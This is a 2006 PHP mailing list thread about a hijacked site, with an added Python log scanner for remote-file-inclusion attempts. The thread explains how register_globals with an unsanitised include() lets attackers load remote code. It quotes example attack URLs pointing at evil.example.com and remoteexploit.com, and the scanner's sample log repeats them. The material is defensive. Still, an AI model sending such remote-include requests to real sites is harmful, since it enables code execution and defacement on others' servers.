With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) 
are automatically populated into variables.  With that in mind    
www.example.com/index.php?path=remoteexploit.com/ would then yield 
include('remoteexploit.com/foo');  thus including ANY code they wish.

----- Original Message ----
From: bruce <[EMAIL PROTECTED]>
To: Eric Butera <[EMAIL PROTECTED]>; tedd <[EMAIL PROTECTED]>
Cc: PHP General List <php-general@lists.php.net>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?

eric...

you say how embarrassing regarding the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?


On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com  http://ancientstones.com  http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
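
Added example (not part of the original thread): a log check for the request pattern Eric describes, a query-string parameter whose value is a remote URL. It assumes Apache common/combined log format; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside an Apache log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A decoded parameter value that starts with a remote scheme.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample log lines (documentation IP range, example hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Nov/2006:09:12:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120
192.0.2.77 - - [13/Nov/2006:09:14:37 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 312
192.0.2.77 - - [13/Nov/2006:09:14:52 -0500] "GET /index.php?path=http%3A%2F%2Fevil.example.com%2F HTTP/1.0" 200 298
"""

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp), a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(log_line):
    """Return [(param, value)] for query parameters whose value is a remote URL."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)  # parse_qsl has already decoded once
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def scan(log_text):
    """Return [(line_number, client_ip, param, value)] for suspicious requests."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for name, value in remote_include_params(line):
            findings.append((n, line.split(" ", 1)[0], name, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also match, so a hit is a lead to check against the script's include/require statements rather than proof of compromise.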
